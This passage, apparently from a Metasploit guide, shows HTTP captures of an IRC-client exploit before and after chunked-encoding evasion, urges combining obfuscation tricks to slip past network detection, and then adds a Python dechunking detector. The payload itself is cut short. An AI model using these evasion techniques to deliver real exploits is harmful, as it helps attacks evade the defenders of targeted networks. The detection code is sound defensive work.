To demonstrate the effect that evasion options can have on the network traffic generated by Metasploit, here is an attack against an IRC client before and after the HTTP::chunked evasion technique is enabled. Here is the exploit before evasion:
    GET /exploit HTTP/1.0

    HTTP/1.1 200 OK
    Server: Apache
    Content-Type: text/html
    Content-Length: 1692
    Connection: close

    <html><iframe src='irc://X891KNFNSPeazXbVVREh50zlxXVzYPqcWB9V8tp6QGcf4UyBJwNee3d
    9fY8XNVqmt07MldpXwNuWAiKjscA2JjXFZt3SariVrl2eGDCNQP1GrNHutrkZNilRKruhjN0Mkqe83mq
    plnmgWkV4Ra5i0UP0AAc0UZ4RXwfrqt1CvL2edWz9Ud7x653yFTDhhTtO4p6CWsf0gZhaVYhINCeWKSS
    0f6sOnJz8O48lyzD1cdBKRezto996FLPVRvnTlTR5z7BqI5GsXcGIn6fnvDJg2u1Vv58L9J6U8u8QxiA
    wFG5uaZGG8rkFpo9MzKQrqpqjkkIUlIlM [continues...]
Here is the same exploit, this time using HTTP chunked encoding to transfer the exploit:
    GET /exploit HTTP/1.0

    HTTP/1.1 200 OK
    Transfer-Encoding: chunked
    Server: Apache
    Content-Type: text/html
    Connection: close

    2
    <h
    8
    tml><ifr
    2
    am
    5
    e src
    5
    ='irc
    4
    ://u
    3
    PK1
    5
    N7ggF
    4
    JL0z
    2
    e6
    8
Even though the exploit works equally well against the web browser (and IRC client), any security device monitoring your network traffic is much less likely to detect the second attack, which uses the chunked encoding. By combining a variety of evasion techniques (such as JavaScript obfuscation, Unicode encoding, and GZIP compression), you can reduce the list of devices capable of detecting your exploit to nearly zero.
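The detection side of the two captures above, as an added example that is not from the original article: a signature matched against the raw bytes misses the chunked response, while the same signature matched after the chunks are reassembled finds it. The signature, the function names and the zero-size chunk that closes the sample are assumptions made for the example.

```python
import re

# Constructed sample: the chunked response from the capture above, cut off
# after its first six chunks and closed with a zero-size chunk.
RAW_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"Server: Apache\r\n"
    b"Content-Type: text/html\r\n"
    b"Connection: close\r\n\r\n"
    b"2\r\n<h\r\n8\r\ntml><ifr\r\n2\r\nam\r\n5\r\ne src\r\n5\r\n='irc\r\n"
    b"4\r\n://u\r\n0\r\n\r\n"
)

# Hypothetical signature: an iframe whose src uses the irc:// scheme.
SIGNATURE = re.compile(rb"<iframe\s+src=['\"]irc://", re.I)


def dechunk(body: bytes) -> bytes:
    """Reassemble an HTTP/1.1 chunked body (RFC 9112 section 7.1)."""
    out, pos = bytearray(), 0
    while True:
        eol = body.find(b"\r\n", pos)
        if eol < 0:
            raise ValueError("missing chunk-size line")
        # Chunk size is hex; anything after ';' is a chunk extension.
        size = int(body[pos:eol].split(b";", 1)[0].strip(), 16)
        pos = eol + 2
        if size == 0:
            return bytes(out)  # last chunk; trailers are ignored
        chunk = body[pos:pos + size]
        if len(chunk) != size or body[pos + size:pos + size + 2] != b"\r\n":
            raise ValueError("truncated or malformed chunk")
        out += chunk
        pos += size + 2


def normalized_body(response: bytes) -> bytes:
    """Return the body as the client sees it, undoing chunked encoding."""
    head, _, body = response.partition(b"\r\n\r\n")
    headers = head.lower().split(b"\r\n")[1:]
    chunked = any(h.startswith(b"transfer-encoding:") and b"chunked" in h
                  for h in headers)
    return dechunk(body) if chunked else body


def detects(response: bytes, normalize: bool) -> bool:
    data = normalized_body(response) if normalize else response
    return SIGNATURE.search(data) is not None
```

A sensor that raises on a malformed chunk stream, as `dechunk` does here, can alert on the parse failure itself rather than silently passing traffic it could not normalize.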